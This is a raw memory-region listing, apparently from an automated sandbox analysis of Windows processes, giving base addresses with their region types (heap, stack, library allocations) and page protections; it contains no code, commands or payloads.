7FF848C2C000
trusted library allocation
page execute and read and write
20A2A681000
trusted library allocation
page read and write
1D3A2E2C000
trusted library allocation
page read and write
7FF848C20000
trusted library allocation
page execute and read and write
7FF848B74000
trusted library allocation
page read and write
20958861000
trusted library allocation
page read and write
7FF848C46000
trusted library allocation
page execute and read and write
2078FF6A000
trusted library allocation
page read and write
2078FF80000
trusted library allocation
page read and write
7FF848DE0000
trusted library allocation
page read and write
7FF848D20000
trusted library allocation
page execute and read and write
20958DF2000
trusted library allocation
page read and write
7FF848B3D000
trusted library allocation
page execute and read and write
1F5408A5000
heap
page read and write
1E2D3806000
heap
page read and write
5058000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
1EBC1CC0000
heap
page read and write
1E2ED8A0000
heap
page execute and read and write
7FF848B63000
trusted library allocation
page execute and read and write
F0105FE000
stack
page read and write
53BF000
stack
page read and write
1D39306B000
trusted library allocation
page read and write
E2B707E000
stack
page read and write
1F542E73000
trusted library allocation
page read and write
20F55B01000
trusted library allocation
page read and write
1770000
trusted library allocation
page execute and read and write
20A42220000
heap
page read and write
506D000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
7FF848CFA000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
D43000
trusted library allocation
page execute and read and write
1D3931EB000
trusted library allocation
page read and write
20F53F50000
trusted library allocation
page read and write
7FF848D30000
trusted library allocation
page execute and read and write
20A2A140000
trusted library allocation
page read and write
1E2D600A000
trusted library allocation
page read and write
267C000
unkown
page read and write
7FF848B63000
trusted library allocation
page execute and read and write
1D392E83000
trusted library allocation
page read and write
7FF848E99000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
7FF848D10000
trusted library allocation
page read and write
1EBC1D10000
heap
page read and write
2569F8E0000
heap
page execute and read and write
1EBC1FC0000
heap
page read and write
2078F7BF000
trusted library allocation
page read and write
5D81000
heap
page read and write
7FF848EA3000
trusted library allocation
page read and write
4FF3000
heap
page read and write
1F543728000
trusted library allocation
page read and write
20968913000
trusted library allocation
page read and write
1D391364000
heap
page read and write
20958D9E000
trusted library allocation
page read and write
1D391202000
heap
page read and write
DA0000
heap
page read and write
207A7AF9000
heap
page read and write
256B7ECB000
heap
page read and write
7FF848DA0000
trusted library allocation
page read and write
D1E000
stack
page read and write
1D391160000
heap
page read and write
7FF848D00000
trusted library allocation
page execute and read and write
20F53DB0000
heap
page read and write
2078FBF5000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
1E2D5BA4000
trusted library allocation
page read and write
3899000
trusted library allocation
page read and write
1EBBFECE000
heap
page read and write
256A1183000
trusted library allocation
page read and write
285E000
trusted library allocation
page read and write
2569DD05000
heap
page read and write
7A13BE000
stack
page read and write
310A000
trusted library allocation
page read and write
7FF848B40000
trusted library allocation
page read and write
7DF4785A0000
trusted library allocation
page execute and read and write
1E2D5B44000
trusted library allocation
page read and write
2078D781000
heap
page read and write
507E000
stack
page read and write
1EBC1D10000
heap
page read and write
1E2D37D8000
heap
page read and write
7FF848C10000
trusted library allocation
page read and write
2078F590000
trusted library allocation
page read and write
1F543543000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page read and write
B87E6BB000
stack
page read and write
1D3A2E80000
trusted library allocation
page read and write
209588A3000
trusted library allocation
page read and write
7FF848D40000
trusted library allocation
page read and write
1E2D5869000
trusted library allocation
page read and write
E2B6E7C000
stack
page read and write
1E2D3680000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
20F53E32000
heap
page read and write
7FF848D1A000
trusted library allocation
page read and write
1D391300000
trusted library allocation
page read and write
1F55ACDD000
heap
page read and write
1F54249E000
trusted library allocation
page read and write
7FF848BF6000
trusted library allocation
page read and write
2880000
heap
page read and write
1E2ED74B000
heap
page read and write
922CE0E000
stack
page read and write
BD57A7E000
stack
page read and write
20959143000
trusted library allocation
page read and write
5066000
trusted library allocation
page read and write
256B7D72000
heap
page read and write
20F53DD0000
heap
page read and write
7FF848D30000
trusted library allocation
page execute and read and write
D80000
heap
page read and write
BD3000
trusted library allocation
page read and write
256B7F09000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
1EBC1D10000
heap
page read and write
1750000
heap
page read and write
2569F923000
heap
page read and write
1D3912A0000
heap
page read and write
1F55A8AC000
heap
page read and write
1D3AB117000
heap
page read and write
5D51000
heap
page read and write
7FF848D60000
trusted library allocation
page execute and read and write
7FF848ED0000
trusted library allocation
page read and write
1E2D54B0000
trusted library allocation
page read and write
F0101CF000
stack
page read and write
6CA000
stack
page read and write
7A143E000
stack
page read and write
7FF848E70000
trusted library allocation
page read and write
20A424F2000
heap
page read and write
1EBC1B22000
heap
page read and write
7FF848B70000
trusted library allocation
page read and write
21CAFDE0000
heap
page read and write
7FF848D21000
trusted library allocation
page read and write
7FF848D12000
trusted library allocation
page read and write
1EBC1D29000
heap
page read and write
1EBC1DC0000
heap
page read and write
6DC8000
heap
page read and write
BE6000
trusted library allocation
page execute and read and write
1D393C6B000
trusted library allocation
page read and write
1F543C89000
trusted library allocation
page read and write
20F57367000
trusted library allocation
page read and write
BD0000
trusted library allocation
page read and write
21CAFDEA000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
1F55AB20000
heap
page execute and read and write
1D3AB177000
heap
page read and write
20958E09000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
20970BAD000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
1F5434E0000
trusted library allocation
page read and write
7A0B4D000
stack
page read and write
2AD6000
trusted library allocation
page read and write
35522FE000
stack
page read and write
1D3946E3000
trusted library allocation
page read and write
1D39475B000
trusted library allocation
page read and write
256B7F38000
heap
page read and write
1EBC1CCF000
heap
page read and write
1D3AB41F000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
20F6E2D0000
heap
page read and write
30FE000
stack
page read and write
1F55AA40000
heap
page read and write
7FF848DC0000
trusted library allocation
page read and write
7FF848DE0000
trusted library allocation
page read and write
20970BB7000
heap
page read and write
1EBC1B2C000
heap
page read and write
DBE45F9000
stack
page read and write
1D392C50000
heap
page read and write
7FF848D50000
trusted library allocation
page read and write
20A2A15D000
trusted library allocation
page read and write
290F000
stack
page read and write
1F55AB50000
heap
page read and write
B87E43E000
stack
page read and write
207A7990000
heap
page execute and read and write
1F544242000
trusted library allocation
page read and write
20958DF6000
trusted library allocation
page read and write
1E2D58AB000
trusted library allocation
page read and write
20A282F0000
heap
page read and write
3121000
trusted library allocation
page read and write
7FF848C46000
trusted library allocation
page execute and read and write
7C8000
stack
page read and write
50FE000
stack
page read and write
7FF848C10000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page read and write
20958D73000
trusted library allocation
page read and write
7FF848CEA000
trusted library allocation
page read and write
922BDBE000
stack
page read and write
2C055924000
heap
page read and write
7FF848BE0000
trusted library allocation
page read and write
1F55A870000
heap
page read and write
2078FB9E000
trusted library allocation
page read and write
2F5E000
stack
page read and write
7FF848D30000
trusted library allocation
page execute and read and write
1EBC1FC1000
heap
page read and write
1EBC1B9E000
heap
page read and write
1EBC1B5B000
heap
page read and write
20A2A5ED000
trusted library allocation
page read and write
DDE000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
CF6000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
1EBC1CDD000
heap
page read and write
4F00000
trusted library allocation
page read and write
20F53EB6000
heap
page read and write
2078F6FD000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
1350000
heap
page read and write
922CC0E000
stack
page read and write
CCB000
stack
page read and write
1EBC1AF8000
heap
page read and write
20F57738000
trusted library allocation
page read and write
922BEB9000
stack
page read and write
20F53EA9000
heap
page read and write
7FF848D11000
trusted library allocation
page read and write
1EBBFC62000
heap
page read and write
1F552718000
trusted library allocation
page read and write
7FF848D40000
trusted library allocation
page read and write
20A2A5A8000
trusted library allocation
page read and write
20F53F10000
heap
page read and write
408000
remote allocation
page execute and read and write
7FF848D2A000
trusted library allocation
page read and write
7FF848E60000
trusted library allocation
page read and write
1D3943D6000
trusted library allocation
page read and write
7FF848DA0000
trusted library allocation
page read and write
1F55A907000
heap
page read and write
5C4F000
stack
page read and write
7FF848E90000
trusted library allocation
page read and write
1E2ED79B000
heap
page read and write
20958E02000
trusted library allocation
page read and write
5054000
trusted library allocation
page read and write
207A7871000
heap
page read and write
BC3000
trusted library allocation
page execute and read and write
2569FC22000
trusted library allocation
page read and write
256B7FF7000
heap
page read and write
7FF848C16000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1E2D37BC000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1E2ED81D000
heap
page read and write
256AFCF0000
trusted library allocation
page read and write
20F53DF8000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
21CAFC80000
heap
page read and write
7FF848C1C000
trusted library allocation
page execute and read and write
1D3AB2A0000
heap
page read and write
1D3912E0000
trusted library allocation
page read and write
1EBBFEC8000
heap
page read and write
922CD0C000
stack
page read and write
20A2A62B000
trusted library allocation
page read and write
E31000
heap
page read and write
3110000
heap
page read and write
1D3A2EBE000
trusted library allocation
page read and write
2569DC20000
heap
page read and write
5940000
heap
page execute and read and write
7FF848DD0000
trusted library allocation
page read and write
29C087E000
stack
page read and write
7FF848B64000
trusted library allocation
page read and write
1F5437E6000
trusted library allocation
page read and write
20958500000
trusted library allocation
page read and write
1F542280000
trusted library section
page read and write
1EBC1B9E000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
7FF848D11000
trusted library allocation
page read and write
1440000
heap
page read and write
20F55790000
trusted library allocation
page read and write
1EBBFECE000
heap
page read and write
20A2A9D7000
trusted library allocation
page read and write
20968923000
trusted library allocation
page read and write
51A0000
heap
page execute and read and write
7FF848E40000
trusted library allocation
page read and write
20A28430000
trusted library allocation
page read and write
7FF848DD0000
trusted library allocation
page read and write
7FF848D12000
trusted library allocation
page read and write
1EBC1CC1000
heap
page read and write
1E2E5741000
trusted library allocation
page read and write
1D3A2F5E000
trusted library allocation
page read and write
DBE4379000
stack
page read and write
D7E000
heap
page read and write
1026000
heap
page read and write
20F53F70000
trusted library allocation
page read and write
55BE000
stack
page read and write
1F5408E5000
heap
page read and write
7FF848D00000
trusted library allocation
page read and write
7FF848E60000
trusted library allocation
page read and write
209588AB000
trusted library allocation
page read and write
1E2D5741000
trusted library allocation
page read and write
2C055920000
heap
page read and write
557E000
stack
page read and write
20F56FCF000
trusted library allocation
page read and write
21CAFEE0000
heap
page read and write
5E30000
trusted library allocation
page read and write
20F6E06D000
heap
page read and write
1EBC1D10000
heap
page read and write
7FF848DB0000
trusted library allocation
page read and write
20A2A9C5000
trusted library allocation
page read and write
1D3943E5000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
4125000
trusted library allocation
page read and write
20958F4C000
trusted library allocation
page read and write
DBE54CE000
stack
page read and write
1D3A2E70000
trusted library allocation
page read and write
2C0554B0000
heap
page read and write
2078FBDA000
trusted library allocation
page read and write
DFF000
heap
page read and write
7FF848B70000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page execute and read and write
1E2ED80B000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
922C1BB000
stack
page read and write
2078F7C2000
trusted library allocation
page read and write
1F55AA4D000
heap
page read and write
7FF848B34000
trusted library allocation
page read and write
2079F6A1000
trusted library allocation
page read and write
105A000
trusted library allocation
page read and write
256A17DD000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
2095912A000
trusted library allocation
page read and write
1E2D586F000
trusted library allocation
page read and write
1E2ED74F000
heap
page read and write
256B7EB2000
heap
page read and write
2078D738000
heap
page read and write
20956705000
heap
page read and write
256A0451000
trusted library allocation
page read and write
256B7F77000
heap
page read and write
1EBBFC80000
heap
page read and write
29C05EE000
stack
page read and write
2C05566A000
heap
page read and write
2B7D000
stack
page read and write
1EBC1FC1000
heap
page read and write
20A3A1BB000
trusted library allocation
page read and write
2078F6A1000
trusted library allocation
page read and write
1E2D3852000
heap
page read and write
35520FA000
stack
page read and write
20A3A101000
trusted library allocation
page read and write
2078F5E0000
heap
page readonly
2079F763000
trusted library allocation
page read and write
7FF848D40000
trusted library allocation
page execute and read and write
F01018F000
stack
page read and write
7FF848DA0000
trusted library allocation
page read and write
1D391140000
heap
page read and write
1D3AB119000
heap
page read and write
2096890B000
trusted library allocation
page read and write
207A77FA000
heap
page read and write
20A28393000
heap
page read and write
1D394365000
trusted library allocation
page read and write
CD0000
heap
page read and write
20A2A61F000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
256B7ED7000
heap
page read and write
8EB000
stack
page read and write
5738000
trusted library allocation
page read and write
20958DA6000
trusted library allocation
page read and write
2CD0000
heap
page read and write
1D391360000
heap
page read and write
922C03E000
stack
page read and write
7FF848B8C000
trusted library allocation
page read and write
20F53F90000
trusted library allocation
page read and write
1D3AB0D0000
heap
page read and write
1D392C00000
heap
page execute and read and write
1D3A2E0F000
trusted library allocation
page read and write
1EBC206C000
heap
page read and write
207A7997000
heap
page execute and read and write
1EBC1CED000
heap
page read and write
1EBC1CEC000
heap
page read and write
7FF848D42000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
1D393218000
trusted library allocation
page read and write
7FF848E62000
trusted library allocation
page read and write
E2B6C7E000
stack
page read and write
20A3A170000
trusted library allocation
page read and write
20958E19000
trusted library allocation
page read and write
2C055590000
heap
page read and write
7FF848EA8000
trusted library allocation
page read and write
4BFE000
stack
page read and write
1D3AB277000
heap
page execute and read and write
256B7D6B000
heap
page read and write
2078F6DE000
trusted library allocation
page read and write
BD576FD000
stack
page read and write
7FF848B73000
trusted library allocation
page execute and read and write
1EBBFECA000
heap
page read and write
1D393067000
trusted library allocation
page read and write
7FF848B7D000
trusted library allocation
page execute and read and write
209589C1000
trusted library allocation
page read and write
20A2A266000
trusted library allocation
page read and write
20970BBC000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
35527FD000
stack
page read and write
5755000
trusted library allocation
page read and write
20F6DE94000
heap
page read and write
F01047F000
stack
page read and write
209584D0000
trusted library allocation
page read and write
1D391226000
heap
page read and write
1D3AB198000
heap
page read and write
7DF43D540000
trusted library allocation
page execute and read and write
20958D9A000
trusted library allocation
page read and write
1F542260000
heap
page read and write
2569DC88000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
7A1F0E000
stack
page read and write
1530000
heap
page read and write
D20000
trusted library allocation
page execute and read and write
256A0C10000
trusted library allocation
page read and write
2078D740000
heap
page read and write
2569FECE000
trusted library allocation
page read and write
209688D1000
trusted library allocation
page read and write
20958E11000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
35529FF000
stack
page read and write
1790000
heap
page read and write
256B7EDF000
heap
page read and write
50BE000
stack
page read and write
DBE3F33000
stack
page read and write
1D3AAC68000
heap
page read and write
1D39325B000
trusted library allocation
page read and write
2569F814000
heap
page read and write
256A0A92000
trusted library allocation
page read and write
2866000
trusted library allocation
page read and write
2E1E000
unkown
page read and write
256AFCEA000
trusted library allocation
page read and write
20A424B8000
heap
page read and write
1E2D3890000
heap
page read and write
3891000
trusted library allocation
page read and write
1F542421000
trusted library allocation
page read and write
2AB1000
trusted library allocation
page read and write
BD57779000
stack
page read and write
5D62000
heap
page read and write
20956720000
heap
page read and write
7A0F7E000
stack
page read and write
7FF848DE0000
trusted library allocation
page read and write
B87E07E000
stack
page read and write
7FF848D58000
trusted library allocation
page read and write
20A3A1B3000
trusted library allocation
page read and write
4EAC000
stack
page read and write
7FF848FC0000
trusted library allocation
page read and write
5705000
trusted library allocation
page read and write
209567DC000
heap
page read and write
7FF848B42000
trusted library allocation
page read and write
2078FBBB000
trusted library allocation
page read and write
307E000
stack
page read and write
7FF848B70000
trusted library allocation
page read and write
1D3946D3000
trusted library allocation
page read and write
7A11B7000
stack
page read and write
1D391354000
heap
page read and write
20A2A677000
trusted library allocation
page read and write
BF2000
trusted library allocation
page read and write
B9C000
stack
page read and write
1EBC1CE9000
heap
page read and write
FEE000
stack
page read and write
209591A6000
trusted library allocation
page read and write
D6A000
trusted library allocation
page execute and read and write
7FF848D50000
trusted library allocation
page read and write
1D3A2C61000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
20958DC1000
trusted library allocation
page read and write
1D39306F000
trusted library allocation
page read and write
2079F711000
trusted library allocation
page read and write
B87E5BE000
stack
page read and write
2569DE90000
heap
page read and write
20F55860000
heap
page read and write
7FF848EF0000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
20A2A221000
trusted library allocation
page read and write
922CB8E000
stack
page read and write
2078FC1B000
trusted library allocation
page read and write
2095681A000
heap
page read and write
60F0000
trusted library allocation
page read and write
20F53F80000
heap
page readonly
7FF848B3D000
trusted library allocation
page execute and read and write
1EBC1D2D000
heap
page read and write
1F542400000
heap
page execute and read and write
5B4E000
stack
page read and write
20970B17000
heap
page execute and read and write
B87E1FE000
stack
page read and write
2569F8E6000
heap
page execute and read and write
1020000
heap
page read and write
20A28490000
trusted library allocation
page read and write
1D3A2C78000
trusted library allocation
page read and write
256B7E90000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
20A3A1EB000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
1F55AC3C000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page read and write
7FF848C80000
trusted library allocation
page execute and read and write
20A42337000
heap
page execute and read and write
2B01000
trusted library allocation
page read and write
2078D829000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
1D3946F4000
trusted library allocation
page read and write
7FF848D90000
trusted library allocation
page read and write
20A2A686000
trusted library allocation
page read and write
F0104FE000
stack
page read and write
7FF848DC0000
trusted library allocation
page read and write
1F543020000
trusted library allocation
page read and write
2BD0000
heap
page read and write
1D392C61000
trusted library allocation
page read and write
503F000
stack
page read and write
2569F640000
trusted library allocation
page read and write
1E2D377E000
heap
page read and write
256B7FE7000
heap
page read and write
7FF848D80000
trusted library allocation
page read and write
2078FB46000
trusted library allocation
page read and write
7FF848C1C000
trusted library allocation
page execute and read and write
7FF848B6D000
trusted library allocation
page execute and read and write
3110000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
20F65B7D000
trusted library allocation
page read and write
1E2D57AD000
trusted library allocation
page read and write
1E2D37B8000
heap
page read and write
7FF848BF0000
trusted library allocation
page execute and read and write
21CAFD90000
heap
page read and write
20A2A67E000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
1F55AC38000
heap
page read and write
2078FBC3000
trusted library allocation
page read and write
DCF000
heap
page read and write
1EBC1B2D000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
20970B62000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
1D3943BA000
trusted library allocation
page read and write
2095897B000
trusted library allocation
page read and write
1D392B10000
trusted library allocation
page read and write
20A283D3000
heap
page read and write
20958DDB000
trusted library allocation
page read and write
20958DB2000
trusted library allocation
page read and write
20956700000
heap
page read and write
7FF848D45000
trusted library allocation
page read and write
2569DCBD000
heap
page read and write
BCD000
trusted library allocation
page execute and read and write
1D3A2E78000
trusted library allocation
page read and write
7A0AC3000
stack
page read and write
3552AFB000
stack
page read and write
20F6DE72000
heap
page read and write
256B7E9B000
heap
page read and write
E2B670F000
stack
page read and write
1504000
trusted library allocation
page read and write
2078DA70000
heap
page read and write
1F540C40000
heap
page read and write
DBE544C000
stack
page read and write
1F5437A6000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
21CAFF10000
heap
page read and write
1F55ACB6000
heap
page read and write
256A0BD7000
trusted library allocation
page read and write
20A422F2000
heap
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF848D52000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
60ED000
stack
page read and write
7FF848F7C000
trusted library allocation
page read and write
1510000
trusted library allocation
page read and write
2078F73A000
trusted library allocation
page read and write
256A077F000
trusted library allocation
page read and write
5044000
trusted library allocation
page read and write
256B7FCC000
heap
page read and write
5EA0000
trusted library allocation
page execute and read and write
1EBBFEC8000
heap
page read and write
FF4000
trusted library allocation
page read and write
7FF848D12000
trusted library allocation
page read and write
1D3911DE000
heap
page read and write
1000000
heap
page execute and read and write
21CAFD94000
heap
page read and write
F01087B000
stack
page read and write
20958DCC000
trusted library allocation
page read and write
7FF848C26000
trusted library allocation
page execute and read and write
E2B6BFB000
stack
page read and write
1F5428EF000
trusted library allocation
page read and write
1D391350000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
7FF848D30000
trusted library allocation
page execute and read and write
5039000
stack
page read and write
20A2838D000
heap
page read and write
29C0E7E000
stack
page read and write
7FF848E50000
trusted library allocation
page read and write
1050000
trusted library allocation
page read and write
1D39437F000
trusted library allocation
page read and write
7FF848D70000
trusted library allocation
page read and write
1E2ED9B0000
heap
page read and write
20F53FB0000
heap
page read and write
20958C26000
trusted library allocation
page read and write
1EBC1AD8000
heap
page read and write
7FF848D50000
trusted library allocation
page read and write
1D3A2F6E000
trusted library allocation
page read and write
2078FC54000
trusted library allocation
page read and write
1F5422D0000
heap
page readonly
2078FC59000
trusted library allocation
page read and write
1E2D5D32000
trusted library allocation
page read and write
7FF848CE1000
trusted library allocation
page read and write
587D000
stack
page read and write
5C8E000
stack
page read and write
BFB000
trusted library allocation
page execute and read and write
256B7FDF000
heap
page read and write
7FF848D90000
trusted library allocation
page read and write
2078F5C0000
trusted library allocation
page read and write
3100000
trusted library allocation
page read and write
613B000
heap
page read and write
1EBBFC8E000
heap
page read and write
1D3A2E5A000
trusted library allocation
page read and write
12F7000
stack
page read and write
1E2ED82F000
heap
page read and write
209567BA000
heap
page read and write
1F552710000
trusted library allocation
page read and write
1EBC1AAB000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
7FF848C16000
trusted library allocation
page execute and read and write
1D3911E9000
heap
page read and write
1F55AC91000
heap
page read and write
1D394736000
trusted library allocation
page read and write
547F000
stack
page read and write
21CAFD95000
heap
page read and write
DBE43FE000
stack
page read and write
1F55AA68000
heap
page read and write
1EBC1CE5000
heap
page read and write
20F6DE7F000
heap
page read and write
1F5435F9000
trusted library allocation
page read and write
2078FBDE000
trusted library allocation
page read and write
1D3AB417000
heap
page read and write
20A29DB0000
heap
page read and write
D77000
trusted library allocation
page execute and read and write
20958D06000
trusted library allocation
page read and write
7FF848B60000
trusted library allocation
page read and write
D54000
trusted library allocation
page read and write
20958DA2000
trusted library allocation
page read and write
7FF848DD0000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
1EBC1B9E000
heap
page read and write
1F55A925000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
7FF848C30000
trusted library allocation
page execute and read and write
20A28230000
heap
page read and write
2861000
trusted library allocation
page read and write
1EBC1FD4000
heap
page read and write
256B7D40000
heap
page read and write
1EBC1AB7000
heap
page read and write
256A0A2F000
trusted library allocation
page read and write
284E000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
D30000
trusted library allocation
page read and write
256AFA4B000
trusted library allocation
page read and write
1D392CE1000
trusted library allocation
page read and write
4A2D000
stack
page read and write
1EBBFB70000
heap
page read and write
7FF848B32000
trusted library allocation
page read and write
7FF848BE6000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
20A2A62E000
trusted library allocation
page read and write
1F542310000
trusted library allocation
page read and write
F010103000
stack
page read and write
20A2AA17000
trusted library allocation
page read and write
DD94F2D000
stack
page read and write
1D393052000
trusted library allocation
page read and write
20F6E045000
heap
page read and write
20958977000
trusted library allocation
page read and write
2078D7CB000
heap
page read and write
E2B6CFD000
stack
page read and write
20A3A17C000
trusted library allocation
page read and write
207A79C0000
heap
page read and write
20958968000
trusted library allocation
page read and write
20A2A21A000
trusted library allocation
page read and write
207A7B1A000
heap
page read and write
1EBBFECB000
heap
page read and write
D4B000
heap
page read and write
1EBC1B2C000
heap
page read and write
1D3AB11B000
heap
page read and write
7FF848C20000
trusted library allocation
page execute and read and write
2C0555B0000
heap
page read and write
D44000
trusted library allocation
page read and write
2078FA5D000
trusted library allocation
page read and write
1EBBFC80000
heap
page read and write
7FF848B90000
trusted library allocation
page read and write
1520000
trusted library allocation
page read and write
7FF848B73000
trusted library allocation
page execute and read and write
209588FC000
trusted library allocation
page read and write
1D3943FD000
trusted library allocation
page read and write
1EBC1CF4000
heap
page read and write
1EBC1FD8000
heap
page read and write
2078F7C5000
trusted library allocation
page read and write
1E2D5070000
heap
page read and write
7FF848E94000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
20F53E2C000
heap
page read and write
2078D690000
heap
page read and write
D40000
heap
page read and write
1E2D5B63000
trusted library allocation
page read and write
1D391320000
trusted library allocation
page read and write
51A3000
heap
page execute and read and write
1F552421000
trusted library allocation
page read and write
7FF848DC0000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
7FF848C26000
trusted library allocation
page read and write
20A423B0000
heap
page read and write
20958D92000
trusted library allocation
page read and write
B87DEFF000
stack
page read and write
7FF848C16000
trusted library allocation
page read and write
7A10F9000
stack
page read and write
1D3911AA000
heap
page read and write
1EBC1AFD000
heap
page read and write
6DC0000
heap
page read and write
B55000
heap
page read and write
1E2D5420000
trusted library allocation
page read and write
3B01000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
DBE53CC000
stack
page read and write
7FF848C16000
trusted library allocation
page read and write
1D39479A000
trusted library allocation
page read and write
172F000
stack
page read and write
4FEC000
stack
page read and write
7A12B8000
stack
page read and write
DBE47FE000
stack
page read and write
7FF848E50000
trusted library allocation
page read and write
2C055660000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
4898000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
7DF4E04B0000
trusted library allocation
page execute and read and write
7FF848E10000
trusted library allocation
page read and write
2569F670000
trusted library allocation
page read and write
1EBC1CD1000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
2A0E000
stack
page read and write
2569DDC0000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page read and write
1EBC1AFC000
heap
page read and write
D7B000
trusted library allocation
page execute and read and write
20A423D0000
heap
page read and write
2078D803000
heap
page read and write
7DF4E04A0000
trusted library allocation
page execute and read and write
20957FD0000
heap
page read and write
7FF848D30000
trusted library allocation
page read and write
155D000
heap
page read and write
B87E33E000
stack
page read and write
7FF848ED0000
trusted library allocation
page read and write
F010AFE000
stack
page read and write
B87DE75000
stack
page read and write
7FF848C10000
trusted library allocation
page read and write
256A1350000
trusted library allocation
page read and write
7FF848DE0000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
D74000
heap
page read and write
20F53CD0000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
2AD0000
trusted library allocation
page read and write
1F5408A3000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
20958DCA000
trusted library allocation
page read and write
7FF848B34000
trusted library allocation
page read and write
29C0FFB000
stack
page read and write
1D3948BC000
trusted library allocation
page read and write
CF0000
heap
page read and write
E2B6AFE000
stack
page read and write
35524FF000
stack
page read and write
FE0000
trusted library allocation
page read and write
D30000
trusted library allocation
page read and write
1F543425000
trusted library allocation
page read and write
20A2A67A000
trusted library allocation
page read and write
7FF848D90000
trusted library allocation
page read and write
2569DDE0000
trusted library allocation
page read and write
B87DF7F000
stack
page read and write
7FF848F60000
trusted library allocation
page read and write
5D30000
heap
page read and write
20A424B4000
heap
page read and write
1F55270E000
trusted library allocation
page read and write
256A12F2000
trusted library allocation
page read and write
1F5422C0000
trusted library allocation
page read and write
20968861000
trusted library allocation
page read and write
20A28250000
heap
page read and write
1E2D5CE4000
trusted library allocation
page read and write
7DF478590000
trusted library allocation
page execute and read and write
1F55AC45000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
7FF848DA0000
trusted library allocation
page read and write
2079F735000
trusted library allocation
page read and write
1F5408E9000
heap
page read and write
20F65B01000
trusted library allocation
page read and write
1EBC1B9E000
heap
page read and write
1F552451000
trusted library allocation
page read and write
7FF848DC0000
trusted library allocation
page read and write
7FF848B80000
trusted library allocation
page read and write
7DF4785B0000
trusted library allocation
page execute and read and write
1F552709000
trusted library allocation
page read and write
7FF848C90000
trusted library allocation
page execute and read and write
1D3AB0B0000
heap
page read and write
20958E1D000
trusted library allocation
page read and write
20F65B10000
trusted library allocation
page read and write
1F55A987000
heap
page execute and read and write
F0108F8000
stack
page read and write
7A14BE000
stack
page read and write
3B05000
trusted library allocation
page read and write
922CD8C000
stack
page read and write
FAE000
stack
page read and write
BD575FE000
stack
page read and write
7FF848D90000
trusted library allocation
page read and write
20958D8A000
trusted library allocation
page read and write
2C055925000
heap
page read and write
B87F14D000
stack
page read and write
29C0B7F000
stack
page read and write
922BE36000
stack
page read and write
1490000
heap
page read and write
E2B6A7F000
stack
page read and write
BD574FE000
stack
page read and write
7FF848D11000
trusted library allocation
page read and write
7FF848DE0000
trusted library allocation
page read and write
1EBBFE20000
heap
page read and write
20A2A146000
trusted library allocation
page read and write
20F55AF0000
heap
page execute and read and write
1E2D585B000
trusted library allocation
page read and write
20F6DE40000
heap
page read and write
1EBC1BA3000
heap
page read and write
7FF848B7D000
trusted library allocation
page execute and read and write
1F55A88E000
heap
page read and write
BD579FE000
stack
page read and write
922C0BC000
stack
page read and write
2078D7EF000
heap
page read and write
1EBC1CE0000
heap
page read and write
7FF848D30000
trusted library allocation
page execute and read and write
1D3943E9000
trusted library allocation
page read and write
2569DDD0000
heap
page readonly
7FF848E60000
trusted library allocation
page read and write
1D394981000
